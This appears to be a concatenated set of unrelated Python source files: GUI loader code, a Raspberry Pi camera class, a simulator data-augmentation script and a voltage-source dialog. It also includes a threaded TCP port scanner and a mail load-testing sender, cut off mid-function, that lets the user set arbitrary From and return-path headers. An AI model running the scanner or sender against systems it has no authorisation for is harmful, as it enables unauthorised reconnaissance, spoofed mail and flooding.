def _representationschanged(self):
offline = self.data["button"]["offline"]
load_button = self.data["button"]["load"]
load_button.setEnabled(False)
model = self.data["model"]["representations"]
item = model.currentItem()
if item is None:
return
if not item.data(QtCore.Qt.ItemIsEnabled):
return
# Update state
document = item.data(RepresentationsRole)[0]
self.data["state"]["context"]["representation"] = document["name"]
template = self.data["state"]["template"]
context = self.data["state"]["context"]
path = template.format(**context)
offline.setEnabled(False)
if path in module._downloading or os.path.exists(path):
offline.setValue(1)
load_button.setEnabled(True)
offline.setToolTip("Already available offline.")
else:
offline.setValue(0)
# Is the representation available at any location?
offline.setEnabled(True)
offline.setToolTip("Toggle to make available offline.")
def on_refresh_pressed(self):
self.refresh()
def on_load_pressed(self):
models = self.data["model"]
representations_model = models["representations"]
representation_item = representations_model.currentItem()
preset = self.data["label"]["preset"]
preset = preset.currentText()
if representation_item is None:
return
for document in representation_item.data(RepresentationsRole):
try:
_id = document["_id"]
self.echo("api.registered_host()."
"load(representation=\"%s\")" % _id)
# Current state
version = document["_version"]
families = version["data"]["families"]
representation = document["name"]
loader = next(
Loader for Loader in api.discover(api.Loader)
if all([
representation in Loader.representations,
any(family in families for family in Loader.families)
])
)
api.load(Loader=loader, representation=_id)
except StopIteration:
raise IndexError("No loaders available")
except ValueError as e:
self.echo(e)
raise
except NameError as e:
self.echo(e)
raise
# Catch-all
except Exception as e:
self.echo("Program error: %s" % str(e))
raise
if self.data["button"]["autoclose"].checkState():
self.close()
def echo(self, message):
widget = self.data["label"]["message"]
widget.setText(str(message))
widget.show()
print(message)
lib.schedule(widget.hide, 5000, channel="message")
def closeEvent(self, event):
# Kill download manager
module._downloads.put((None, None))
# Kill on holding SHIFT
modifiers = QtWidgets.QApplication.queryKeyboardModifiers()
shift_pressed = QtCore.Qt.ShiftModifier & modifiers
if shift_pressed:
print("Force quitted..")
module.closed = True
self.setAttribute(QtCore.Qt.WA_DeleteOnClose)
print("Good bye")
return super(Window, self).closeEvent(event)
def show(root=None, debug=False, parent=None):
"""Display Loader GUI
Arguments:
debug (bool, optional): Run loader in debug-mode,
defaults to False
"""
# Remember window
if module.window is not None:
try:
return module.window.show()
except RuntimeError as e:
if not e.message.rstrip().endswith("already deleted."):
raise
# Garbage collected
module.window = None
if debug:
import traceback
sys.excepthook = lambda typ, val, tb: traceback.print_last()
io.install()
any_project = next(
project for project in io.projects()
if project.get("active", True) is not False
)
api.Session["AVALON_PROJECT"] = any_project["name"]
with lib.application():
window = Window(parent)
window.show()
window.refresh()
module.window = window
|
pigear.py
|
"""
===============================================
vidgear library source-code is deployed under the Apache 2.0 License:
Copyright (c) 2019 Abhishek Thakur(@abhiTronix) <abhi.una12@gmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
===============================================
"""
# import the necessary packages
import cv2
import sys
import time
import logging as log
from threading import Thread
# import helper packages
from .helper import capPropId, logger_handler, import_dependency_safe
# safe import critical Class modules
picamera = import_dependency_safe("picamera", error="silent")
if not (picamera is None):
from picamera import PiCamera
from picamera.array import PiRGBArray
# define logger
logger = log.getLogger("PiGear")
logger.propagate = False
logger.addHandler(logger_handler())
logger.setLevel(log.DEBUG)
class PiGear:
"""
PiGear is similar to CamGear API but exclusively made to support various Raspberry Pi Camera Modules (such as OmniVision OV5647 Camera Module and Sony IMX219 Camera Module).
PiGear provides a flexible multi-threaded framework around complete picamera python library, and provide us the ability to exploit almost all of its parameters like brightness,
saturation, sensor_mode, iso, exposure, etc. effortlessly. Furthermore, PiGear also supports multiple camera modules, such as in the case of Raspberry-Pi Compute Module IO boards.
Best of all, PiGear contains Threaded Internal Timer - that silently keeps active track of any frozen-threads/hardware-failures and exit safely, if any does occur. That means that
if you're running PiGear API in your script and someone accidentally pulls the Camera-Module cable out, instead of going into possible kernel panic, API will exit safely to save resources.
!!! warning "Make sure to enable [Raspberry Pi hardware-specific settings](https://picamera.readthedocs.io/en/release-1.13/quickstart.html) prior using this API, otherwise nothing will work."
"""
def __init__(
self,
camera_num=0,
resolution=(640, 480),
framerate=30,
colorspace=None,
logging=False,
time_delay=0,
**options
):
"""
This constructor method initializes the object state and attributes of the PiGear class.
Parameters:
camera_num (int): selects the camera module index which will be used as source.
resolution (tuple): sets the resolution (i.e. `(width,height)`) of the source..
framerate (int/float): sets the framerate of the source.
colorspace (str): selects the colorspace of the input stream.
logging (bool): enables/disables logging.
time_delay (int): time delay (in sec) before start reading the frames.
options (dict): provides ability to alter Source Tweak Parameters.
"""
# raise error(s) for critical Class imports
import_dependency_safe(
"picamera" if picamera is None else "",
)
# enable logging if specified
self.__logging = False
if logging:
self.__logging = logging
assert (
isinstance(framerate, (int, float)) and framerate > 5.0
), "[PiGear:ERROR] :: Input framerate value `{}` is a Invalid! Kindly read docs.".format(
framerate
)
assert (
isinstance(resolution, (tuple, list)) and len(resolution) == 2
), "[PiGear:ERROR] :: Input resolution value `{}` is a Invalid! Kindly read docs.".format(
resolution
)
if not (isinstance(camera_num, int) and camera_num >= 0):
camera_num = 0
logger.warning(
"Input camera_num value `{}` is invalid, Defaulting to index 0!"
)
# initialize the picamera stream at given index
self.__camera = PiCamera(camera_num=camera_num)
self.__camera.resolution = tuple(resolution)
self.__camera.framerate = framerate
if self.__logging:
logger.debug(
"Activating Pi camera at index: {} with resolution: {} & framerate: {}".format(
camera_num, resolution, framerate
)
)
# initialize framerate variable
self.framerate = framerate
# initializing colorspace variable
self.color_space = None
# reformat dict
options = {str(k).strip(): v for k, v in options.items()}
# define timeout variable default value(handles hardware failures)
self.__failure_timeout = options.pop("HWFAILURE_TIMEOUT", 2.0)
if isinstance(self.__failure_timeout, (int, float)):
if not (10.0 > self.__failure_timeout > 1.0):
raise ValueError(
"[PiGear:ERROR] :: `HWFAILURE_TIMEOUT` value can only be between 1.0 ~ 10.0"
)
if self.__logging:
logger.debug(
"Setting HW Failure Timeout: {} seconds".format(
self.__failure_timeout
)
)
else:
# reset improper values
self.__failure_timeout = 2.0
try:
# apply attributes to source if specified
for key, value in options.items():
if self.__logging:
logger.debug("Setting Parameter: {} = '{}'".format(key, value))
setattr(self.__camera, key, value)
except Exception as e:
# Catch if any error occurred
logger.exception(str(e))
# separately handle colorspace value to int conversion
if not (colorspace is None):
self.color_space = capPropId(colorspace.strip())
if self.__logging and not (self.color_space is None):
logger.debug(
"Enabling `{}` colorspace for this video stream!".format(
colorspace.strip()
)
)
# enable rgb capture array thread and capture stream
self.__rawCapture = PiRGBArray(self.__camera, size=resolution)
self.stream = self.__camera.capture_continuous(
self.__rawCapture, format="bgr", use_video_port=True
)
# frame variable initialization
self.frame = None
try:
stream = next(self.stream)
self.frame = stream.array
self.__rawCapture.seek(0)
self.__rawCapture.truncate()
# render colorspace if defined
if not (self.frame is None) and not (self.color_space is None):
self.frame = cv2.cvtColor(self.frame, self.color_space)
except Exception as e:
logger.exception(str(e))
raise RuntimeError("[PiGear:ERROR] :: Camera Module failed to initialize!")
# applying time delay to warm-up picamera only if specified
if time_delay and isinstance(time_delay, (int, float)):
time.sleep(time_delay)
# thread initialization
self.__thread = None
# timer thread initialization(Keeps check on frozen thread)
self.__timer = None
self.__t_elasped = 0.0 # records time taken by thread
# catching thread exceptions
self.__exceptions = None
# initialize termination flag
self.__terminate = False
def start(self):
"""
Launches the internal *Threaded Frames Extractor* daemon
**Returns:** A reference to the CamGear class object.
"""
# Start frame producer thread
self.__thread = Thread(target=self.__update, name="PiGear", args=())
self.__thread.daemon = True
self.__thread.start()
# Start internal timer thread
self.__timer = Thread(target=self.__timeit, name="PiTimer", args=())
self.__timer.daemon = True
self.__timer.start()
return self
def __timeit(self):
"""
Threaded Internal Timer that keep checks on thread excecution timing
"""
# assign current time
self.__t_elasped = time.time()
# loop until termainated
while not (self.__terminate):
# check for frozen thread
if time.time() - self.__t_elasped > self.__failure_timeout:
# log failure
if self.__logging:
logger.critical("Camera Module Disconnected!")
# prepare for clean exit
self.__exceptions = True
self.__terminate = True # self-terminate
def __update(self):
"""
A **Threaded Frames Extractor**, that keep iterating frames from PiCamera API to a internal monitored deque,
until the thread is terminated, or frames runs out.
"""
# keep looping infinitely until the thread is terminated
while not (self.__terminate):
try:
# Try to iterate next frame from generator
stream = next(self.stream)
except Exception:
# catch and save any exceptions
self.__exceptions = sys.exc_info()
break # exit
# __update timer
self.__t_elasped = time.time()
# grab the frame from the stream and clear the stream in
# preparation for the next frame
frame = stream.array
self.__rawCapture.seek(0)
self.__rawCapture.truncate()
# apply colorspace if specified
if not (self.color_space is None):
# apply colorspace to frames
color_frame = None
try:
if isinstance(self.color_space, int):
color_frame = cv2.cvtColor(frame, self.color_space)
else:
if self.__logging:
logger.warning(
"Global color_space parameter value `{}` is not a valid!".format(
self.color_space
)
)
self.color_space = None
except Exception as e:
# Catch if any error occurred
self.color_space = None
if self.__logging:
logger.exception(str(e))
logger.warning("Input colorspace is not a valid colorspace!")
if not (color_frame is None):
self.frame = color_frame
else:
self.frame = frame
else:
self.frame = frame
# terminate processes
if not (self.__terminate):
self.__terminate = True
# release picamera resources
self.__rawCapture.close()
self.__camera.close()
def read(self):
"""
Extracts frames synchronously from monitored deque, while maintaining a fixed-length frame buffer in the memory,
and blocks the thread if the deque is full.
**Returns:** A n-dimensional numpy array.
"""
# check if there are any thread exceptions
if not (self.__exceptions is None):
if isinstance(self.__exceptions, bool):
# clear frame
self.frame = None
# notify user about hardware failure
raise SystemError(
"[PiGear:ERROR] :: Hardware failure occurred, Kindly reconnect Camera Module and restart your Pi!"
)
else:
# clear frame
self.frame = None
# re-raise error for debugging
error_msg = (
"[PiGear:ERROR] :: Camera Module API failure occured: {}".format(
self.__exceptions[1]
)
)
raise RuntimeError(error_msg).with_traceback(self.__exceptions[2])
# return the frame
return self.frame
def stop(self):
"""
Safely terminates the thread, and release the VideoStream resources.
"""
if self.__logging:
logger.debug("Terminating PiGear Processes.")
# make sure that the threads should be terminated
self.__terminate = True
# stop timer thread
if not (self.__timer is None):
self.__timer.join()
self.__timer = None
# handle camera thread
if not (self.__thread is None):
# check if hardware failure occured
if not (self.__exceptions is None) and isinstance(self.__exceptions, bool):
# force release picamera resources
self.__rawCapture.close()
self.__camera.close()
# properly handle thread exit
self.__thread.join() # wait if still process is still processing some information
# remove any threads
self.__thread = None
|
augment_trajectories.py
|
import os
import sys
sys.path.append(os.path.join(os.environ['ALFWORLD_ROOT']))
sys.path.append(os.path.join(os.environ['ALFWORLD_ROOT'], 'gen'))
import json
import glob
import os
import constants
import cv2
import shutil
import numpy as np
import argparse
import threading
import time
import copy
import random
from utils.video_util import VideoSaver
from utils.py_util import walklevel
from env.thor_env import ThorEnv
import pdb
TRAJ_DATA_JSON_FILENAME = "traj_data.json"
AUGMENTED_TRAJ_DATA_JSON_FILENAME = "augmented_traj_data.json"
IMAGES_FOLDER = "images"
MASKS_FOLDER = "masks"
META_FOLDER = "meta"
IMAGE_WIDTH = 400
IMAGE_HEIGHT = 400
render_settings = dict()
render_settings['renderImage'] = True
render_settings['renderDepthImage'] = True
render_settings['renderObjectImage'] = True
render_settings['renderClassImage'] = True
video_saver = VideoSaver()
def get_image_index(save_path):
return len(glob.glob(save_path + '/*.png'))
def save_image_with_delays(env, action,
save_path, direction=constants.BEFORE):
im_ind = get_image_index(save_path)
counts = constants.SAVE_FRAME_BEFORE_AND_AFTER_COUNTS[action['action']][direction]
for i in range(counts):
save_image(env.last_event, save_path)
env.noop()
return im_ind
def save_image(event, save_path):
# rgb
rgb_save_path = os.path.join(save_path, IMAGES_FOLDER)
rgb_image = event.frame[:, :, ::-1]
# masks
mask_save_path = os.path.join(save_path, MASKS_FOLDER)
mask_image = event.instance_segmentation_frame
# dump images
im_ind = get_image_index(rgb_save_path)
cv2.imwrite(rgb_save_path + '/%09d.png' % im_ind, rgb_image)
cv2.imwrite(mask_save_path + '/%09d.png' % im_ind, mask_image)
return im_ind
def save_images_in_events(events, root_dir):
for event in events:
save_image(event, root_dir)
def clear_and_create_dir(path):
# if os.path.exists(path):
# shutil.rmtree(path)
if not os.path.exists(path):
os.makedirs(path)
def get_scene_type(scene_num):
if scene_num < 100:
return 'kitchen'
elif scene_num < 300:
return 'living'
elif scene_num < 400:
return 'bedroom'
else:
return 'bathroom'
def get_openable_points(traj_data):
scene_num = traj_data['scene']['scene_num']
openable_json_file = os.path.join(os.environ['ALFWORLD_ROOT'], 'gen/layouts/FloorPlan%d-openable.json' % scene_num)
with open(openable_json_file, 'r') as f:
openable_points = json.load(f)
return openable_points
def explore_scene(env, traj_data, root_dir):
'''
Use pre-computed openable points from ALFRED to store receptacle locations
'''
openable_points = get_openable_points(traj_data)
agent_height = env.last_event.metadata['agent']['position']['y']
for recep_id, point in openable_points.items():
recep_class = recep_id.split("|")[0]
action = {'action': 'TeleportFull',
'x': point[0],
'y': agent_height,
'z': point[1],
'rotateOnTeleport': False,
'rotation': point[2],
'horizon': point[3]}
event = env.step(action)
save_frame(env, event, root_dir)
def augment_traj(env, json_file):
# load json data
with open(json_file) as f:
traj_data = json.load(f)
# fresh images list
traj_data['images'] = list()
# scene setup
scene_num = traj_data['scene']['scene_num']
object_poses = traj_data['scene']['object_poses']
object_toggles = traj_data['scene']['object_toggles']
dirty_and_empty = traj_data['scene']['dirty_and_empty']
# reset
scene_name = 'FloorPlan%d' % scene_num
scene_type = get_scene_type(scene_num)
env.reset(scene_name)
env.restore_scene(object_poses, object_toggles, dirty_and_empty)
root_dir = os.path.join(args.save_path, scene_type)
imgs_dir = os.path.join(root_dir, IMAGES_FOLDER)
mask_dir = os.path.join(root_dir, MASKS_FOLDER)
meta_dir = os.path.join(root_dir, META_FOLDER)
clear_and_create_dir(imgs_dir)
clear_and_create_dir(mask_dir)
clear_and_create_dir(meta_dir)
explore_scene(env, traj_data, root_dir)
env.step(dict(traj_data['scene']['init_action']))
# print("Task: %s" % (traj_data['template']['task_desc']))
# setup task
env.set_task(traj_data, args, reward_type='dense')
rewards = []
for ll_idx, ll_action in enumerate(traj_data['plan']['low_actions']):
# next cmd under the current hl_action
cmd = ll_action['api_action']
hl_action = traj_data['plan']['high_pddl'][ll_action['high_idx']]
# remove unnecessary keys
cmd = {k: cmd[k] for k in ['action', 'objectId', 'receptacleObjectId', 'placeStationary', 'forceAction'] if k in cmd}
if "MoveAhead" in cmd['action']:
event = env.step(cmd)
elif "Rotate" in cmd['action']:
event = env.step(cmd)
elif "Look" in cmd['action']:
event = env.step(cmd)
else:
event = env.step(cmd)
save_frame(env, event, root_dir)
if not event.metadata['lastActionSuccess']:
raise Exception("Replay Failed: %s" % (env.last_event.metadata['errorMessage']))
def save_frame(env, event, root_dir):
im_idx = save_image(event, root_dir)
# store color to object type dictionary
color_to_obj_id_type = {}
all_objects = env.last_event.metadata['objects']
pdb.set_trace()
for color, object_id in env.last_event.color_to_object_id.items():
color_to_obj_id_type[str(color)] = object_id
meta_file = os.path.join(root_dir, META_FOLDER, "%09d.json" % im_idx)
with open(meta_file, 'w') as f:
json.dump(color_to_obj_id_type, f)
# print("Total Size: %s" % im_idx)
def run():
'''
replay loop
'''
# start THOR env
env = ThorEnv(player_screen_width=IMAGE_WIDTH,
player_screen_height=IMAGE_HEIGHT)
skipped_files = []
finished = []
cache_file = os.path.join(args.save_path, "cache.json")
while len(traj_list) > 0:
json_file = traj_list.pop()
print ("(%d Left) Augmenting: %s" % (len(traj_list), json_file))
try:
augment_traj(env, json_file)
finished.append(json_file)
with open(cache_file, 'w') as f:
json.dump({'finished': finished}, f)
except Exception as e:
import traceback
traceback.print_exc()
print ("Error: " + repr(e))
print ("Skipping " + json_file)
skipped_files.append(json_file)
env.stop()
print("Finished.")
# skipped files
if len(skipped_files) > 0:
print("Skipped Files:")
print(skipped_files)
traj_list = []
lock = threading.Lock()
# parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('--data_path', type=str, default="data/2.1.0")
parser.add_argument('--save_path', type=str, default="detector/data/")
parser.add_argument('--smooth_nav', dest='smooth_nav', action='store_true')
parser.add_argument('--time_delays', dest='time_delays', action='store_true')
parser.add_argument('--shuffle', dest='shuffle', action='store_true')
parser.add_argument('--num_threads', type=int, default=1)
parser.add_argument('--reward_config', type=str, default='agents/config/rewards.json')
args = parser.parse_args()
# cache
cache_file = os.path.join(args.save_path, "cache.json")
if os.path.isfile(cache_file):
with open(cache_file, 'r') as f:
finished_jsons = json.load(f)
else:
finished_jsons = {'finished': []}
# make a list of all the traj_data json files
for dir_name, subdir_list, file_list in walklevel(args.data_path, level=2):
if "trial_" in dir_name:
json_file = os.path.join(dir_name, TRAJ_DATA_JSON_FILENAME)
if not os.path.isfile(json_file) or json_file in finished_jsons['finished']:
continue
traj_list.append(json_file)
# random shuffle
if args.shuffle:
random.shuffle(traj_list)
# start threads
run()
# threads = []
# for n in range(args.num_threads):
# thread = threading.Thread(target=run)
# threads.append(thread)
# thread.start()
# time.sleep(1)
|
ch4_voltage_source.py
|
from functools import partial
from pubsub import pub
from threading import Thread
from time import sleep
import wx
from wx.lib.agw.floatspin import FloatSpin
from spacq.gui.tool.box import load_csv, save_csv, Dialog, MessageDialog
from spacq.interface.units import Quantity
"""
Configuration for a ch4VoltageSource.
"""
class ch4VoltageSourceTunerDialog(Dialog):
"""
A dialog for tuning a voltage source port.
"""
def __init__(self, parent, global_store, ok_callback, port, *args, **kwargs):
Dialog.__init__(self, parent, title='Port {0} tuning'.format(port.num))
self.global_store = global_store
self.ok_callback = ok_callback
self.port = port
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Self-calibration.
calibration_static_box = wx.StaticBox(self, label='DAC self-calibration')
calibration_box = wx.StaticBoxSizer(calibration_static_box, wx.VERTICAL)
dialog_box.Add(calibration_box, flag=wx.EXPAND|wx.ALL, border=5)
self.calibrate_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrate, self.calibrate_button)
calibration_box.Add(self.calibrate_button, flag=wx.EXPAND)
## Tuning.
tuning_static_box = wx.StaticBox(self, label='Tuning')
tuning_box = wx.StaticBoxSizer(tuning_static_box, wx.VERTICAL)
dialog_box.Add(tuning_box, flag=wx.EXPAND)
### Autotune.
autotuning_static_box = wx.StaticBox(self, label='Autotuning')
autotuning_box = wx.StaticBoxSizer(autotuning_static_box, wx.VERTICAL)
tuning_box.Add(autotuning_box, flag=wx.EXPAND|wx.ALL, border=5)
autotuning_sizer = wx.FlexGridSizer(rows=3, cols=2, hgap=5)
autotuning_box.Add(autotuning_sizer, flag=wx.CENTER)
autotuning_sizer.Add(wx.StaticText(self, label='Resource name:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.resource_name_input = wx.TextCtrl(self, size=(300,-1))
autotuning_sizer.Add(self.resource_name_input)
autotuning_sizer.Add(wx.StaticText(self, label='Max:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automax_input = FloatSpin(self, value=1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automax_input)
autotuning_sizer.Add(wx.StaticText(self, label='Min:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.automin_input = FloatSpin(self, value=-1, min_val=-10, max_val=10, increment=1,
digits=5)
autotuning_sizer.Add(self.automin_input)
self.autotune_button = wx.Button(self, label='Autotune')
self.Bind(wx.EVT_BUTTON, self.OnAutotune, self.autotune_button)
autotuning_box.Add(self.autotune_button, flag=wx.EXPAND)
### Manual tune.
tuning_sizer = wx.FlexGridSizer(rows=2, cols=2, hgap=5)
tuning_box.Add(tuning_sizer, flag=wx.CENTER)
tuning_sizer.Add(wx.StaticText(self, label='Gain:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.gain_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.gain_input)
tuning_sizer.Add(wx.StaticText(self, label='Offset:'),
flag=wx.ALIGN_CENTER_VERTICAL|wx.ALIGN_RIGHT)
self.offset_input = FloatSpin(self, value=0, min_val=-1e6, max_val=1e6, increment=1,
digits=5)
tuning_sizer.Add(self.offset_input)
## End buttons.
button_box = wx.BoxSizer(wx.HORIZONTAL)
dialog_box.Add(button_box, flag=wx.CENTER|wx.ALL, border=5)
ok_button = wx.Button(self, wx.ID_OK)
self.Bind(wx.EVT_BUTTON, self.OnOk, ok_button)
button_box.Add(ok_button)
cancel_button = wx.Button(self, wx.ID_CANCEL)
button_box.Add(cancel_button)
self.SetSizerAndFit(dialog_box)
def autotune(self, resource):
gain, offset = self.port.autotune(resource, set_result=False,
min_value=self.automin_input.GetValue(),
max_value=self.automax_input.GetValue())
wx.CallAfter(self.gain_input.SetValue, gain)
wx.CallAfter(self.offset_input.SetValue, offset)
wx.CallAfter(self.autotune_button.Enable)
def self_calbrate(self):
self.port.apply_settings(calibrate=True)
sleep(self.port.calibration_delay)
wx.CallAfter(self.calibrate_button.Enable)
def SetValue(self, gain, offset):
self.gain_input.SetValue(gain)
self.offset_input.SetValue(offset)
def GetValue(self):
return (self.gain_input.GetValue(), self.offset_input.GetValue())
def OnAutotune(self, evt=None):
name = self.resource_name_input.Value
if not name:
MessageDialog(self, 'No resource provided').Show()
return
try:
resource = self.global_store.resources[name]
except KeyError:
MessageDialog(self, name, 'Missing resource').Show()
return
if not resource.readable:
MessageDialog(self, name, 'Unreadable resource').Show()
return
self.autotune_button.Disable()
thr = Thread(target=self.autotune, args=(resource,))
thr.daemon = True
thr.start()
def OnCalibrate(self, evt=None):
self.calibrate_button.Disable()
thr = Thread(target=self.self_calbrate)
thr.daemon = True
thr.start()
def OnOk(self, evt=None):
self.ok_callback(self)
self.Destroy()
class ch4VoltageSourceSettingsPanel(wx.Panel):
"""
All the settings for a voltage source.
"""
def __init__(self, parent, global_store, vsrc, *args, **kwargs):
wx.Panel.__init__(self, parent, *args, **kwargs)
self.global_store = global_store
self.vsrc = vsrc
self.port_value_inputs = []
self.port_buttons = []
# Panel.
panel_box = wx.BoxSizer(wx.VERTICAL)
## Ports.
ports_box = wx.FlexGridSizer(rows=3, cols=2)
panel_box.Add(ports_box)
for port in range(4):
port_static_box = wx.StaticBox(self, label='Port {0} '.format(port))
port_box = wx.StaticBoxSizer(port_static_box, wx.HORIZONTAL)
ports_box.Add(port_box, flag=wx.ALL, border=5)
spin = FloatSpin(self, value=0, min_val=-10, max_val=10, increment=1, digits=6)
self.port_value_inputs.append(spin)
port_box.Add(spin)
port_box.Add(wx.StaticText(self, label='V'))
set_button = wx.Button(self, label='Set', style=wx.BU_EXACTFIT)
set_button.Bind(wx.EVT_BUTTON, partial(self.OnSetVoltage, port))
port_box.Add(set_button)
tune_button = wx.Button(self, label='Tune...', style=wx.BU_EXACTFIT)
tune_button.Bind(wx.EVT_BUTTON, partial(self.OnTune, port))
port_box.Add(tune_button)
self.port_buttons.append((set_button, tune_button))
## All ports.
button_static_box = wx.StaticBox(self, label='All ports')
button_box = wx.StaticBoxSizer(button_static_box, wx.HORIZONTAL)
panel_box.Add(button_box, flag=wx.CENTER)
### Zero.
zero_all_button = wx.Button(self, label='Zero')
self.Bind(wx.EVT_BUTTON, self.OnZeroAll, zero_all_button)
button_box.Add(zero_all_button, flag=wx.CENTER)
### Self-calibrate.
self.calibrate_all_button = wx.Button(self, label='Self-calibrate')
self.Bind(wx.EVT_BUTTON, self.OnCalibrateAll, self.calibrate_all_button)
button_box.Add(self.calibrate_all_button, flag=wx.CENTER)
### Load tuning.
tuning_data_static_box = wx.StaticBox(self, label='Tuning data')
tuning_data_box = wx.StaticBoxSizer(tuning_data_static_box, wx.HORIZONTAL)
button_box.Add(tuning_data_box)
#### Save.
tuning_data_save_button = wx.Button(self, label='Save...')
self.Bind(wx.EVT_BUTTON, self.OnSave, tuning_data_save_button)
tuning_data_box.Add(tuning_data_save_button)
#### Load.
tuning_data_load_button = wx.Button(self, label='Load...')
self.Bind(wx.EVT_BUTTON, self.OnLoad, tuning_data_load_button)
tuning_data_box.Add(tuning_data_load_button)
self.SetSizer(panel_box)
def self_calbrate_all(self):
delay = 0 # s
for port in self.vsrc.ports:
# Use the largest delay.
if port.calibration_delay > delay:
delay = port.calibration_delay
port.apply_settings(calibrate=True)
sleep(delay)
wx.CallAfter(self.calibrate_all_button.Enable)
def zero_all(self):
for port in self.vsrc.ports:
port.voltage = Quantity(0.0, 'V')
def OnSetVoltage(self, port_num, evt=None):
try:
self.vsrc.ports[port_num].voltage = Quantity(self.port_value_inputs[port_num].GetValue(), 'V')
except ValueError as e:
MessageDialog(self, str(e), 'Invalid value').Show()
def OnTune(self, port_num, evt=None):
port = self.vsrc.ports[port_num]
def ok_callback(dlg):
port.gain, port.offset = dlg.GetValue()
dlg = ch4VoltageSourceTunerDialog(self, self.global_store, ok_callback, port)
dlg.SetValue(port.gain, port.offset)
dlg.Show()
def OnCalibrateAll(self, evt=None):
self.calibrate_all_button.Disable()
thr = Thread(target=self.self_calbrate_all)
thr.daemon = True
thr.start()
def OnZeroAll(self, evt=None):
thr = Thread(target=self.zero_all)
thr.daemon = True
thr.start()
def OnSave(self, evt=None):
values = [[port.gain, port.offset] for port in self.vsrc.ports]
try:
save_csv(self, values)
except IOError as e:
MessageDialog(self, str(e), 'Save error').Show()
return
def OnLoad(self, evt=None):
try:
result = load_csv(self)
if result is None:
return
has_header, values, _ = result
if has_header:
port_values = values[1:]
else:
port_values = values
if len(port_values) != len(self.vsrc.ports):
raise ValueError('Invalid number of ports.')
for i, port_value in enumerate(port_values):
if len(port_value) != 2:
raise ValueError('Invalid number of settings for port {0}.'.format(i))
try:
float(port_value[0])
float(port_value[1])
except TypeError:
raise ValueError('Not a number for port {0}.'.format(i))
except (IOError, ValueError) as e:
MessageDialog(self, str(e), 'Load error').Show()
return
for port, values in zip(self.vsrc.ports, port_values):
port.gain = float(values[0])
port.offset = float(values[1])
class ch4VoltageSourceSettingsDialog(Dialog):
"""
A wrapper for ch4VoltageSourceSettingsPanel.
"""
def __init__(self, parent, global_store, vsrc_name, *args, **kwargs):
# If the device doesn't exist, give up.
try:
vsrc = global_store.devices[vsrc_name].device
except (KeyError, AttributeError):
self.Destroy()
return
Dialog.__init__(self, parent, title='Four channel voltage source settings', *args, **kwargs)
self.vsrc_name = vsrc_name
# Dialog.
dialog_box = wx.BoxSizer(wx.VERTICAL)
## Settings panel.
self.panel = ch4VoltageSourceSettingsPanel(self, global_store, vsrc)
dialog_box.Add(self.panel)
self.SetSizerAndFit(dialog_box)
# Subscriptions.
pub.subscribe(self.msg_device, 'device.added')
pub.subscribe(self.msg_device, 'device.removed')
def msg_device(self, name, value=None):
if name == self.vsrc_name:
# Device has changed, so we can't trust it anymore.
self.Destroy()
return
|
port_scanner.py
|
import requests
import socket
import threading
requests.packages.urllib3.disable_warnings() # noqa
class ScanPort:
def __init__(self, target, start_port=None, end_port=None):
self.target = target
self.from_port = start_port
self.to_port = end_port
self.ports = []
def scanner(self, target, port):
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(0.3)
sock.connect((target, port))
self.ports.append(port)
except Exception as f: # noqa
pass
def __call__(self, *args, **kwargs):
if self.from_port is None:
self.from_port = 1
if self.to_port is None:
self.to_port = 10000
try:
num = 1
for port in range(self.from_port, self.to_port+1):
num += 1
t1 = threading.Thread(target=self.scanner, args=[self.target, port])
t1.start()
if num >= 50:
for stop_thread in range(1, 100):
t1.join()
num = 0
except Exception as e: # noqa
pass
def scanport(target, start_port=None, end_port=None):
return ScanPort(target, start_port, end_port)()
|
mail-measure.py
|
# coding: utf-8
import sys
import smtplib
import socket
import time
from email.MIMEText import MIMEText
from PyQt4 import QtGui, uic, QtCore
from multiprocessing import Process
"""
sendmail examples: https://docs.python.org/2/library/email-examples.html
"""
class form(QtGui.QMainWindow):
def __init__(self):
super(form, self).__init__()
self.ui = uic.loadUi('measure.ui', self)
self.show()
self.connect(self.ui.form_start, QtCore.SIGNAL("clicked()"), self.create_jobs)
self.connect(self.ui.form_stop, QtCore.SIGNAL("clicked()"), self.stop_sendmail)
def stop_sendmail(self):
print "terminate"
exit(0)
def create_jobs(self):
print "create_jobs (%s) " % self.ui.mail_total.text()
jobs = list()
mps = int(self.ui.mps.text())
for i in range(int(self.ui.mail_total.text())):
jobs.append(Process(target = self.start_sendmail),)
for job in jobs:
job.start()
if mps == 0:
mps = 1
time.sleep(1.0 / mps)
time.sleep(1.0 / mps)
for job in jobs:
job.join()
def start_sendmail(self):
"""
print self.ui.form_mailserver.text()
print self.ui.form_ehlo.text()
print self.ui.form_mailfrom.text()
print self.ui.form_rcptto.text()
print self.ui.form_subject.text()
print self.ui.form_data.toPlainText()
print self.ui.form_mailfrom_inc.isChecked()
"""
start = time.time()
msg = MIMEText(str(self.ui.form_data.toPlainText()), _charset='euc-kr')
""" subject """
msg['Subject'] = str(self.ui.form_subject.text())
""" from """
ENVFrom = str(self.ui.form_mailfrom.text())
""" rcpt to """
recipients = []
for recipient in str(self.ui.form_rcptto.text()).split(","):
recipients.append(recipient)
#msg['To'] = ", ".join(recipients)
""" header from/to """
if len(str(self.ui.form_headerfrom.text()).strip()) != 0:
msg['From'] = str(self.ui.form_headerfrom.text())
if len(str(self.ui.form_headerto.text()).strip()) != 0:
msg['To'] = str(self.ui.form_headerto.text())
""" return-path """
if len(str(self.ui.form_returnpath.text()).strip()) != 0:
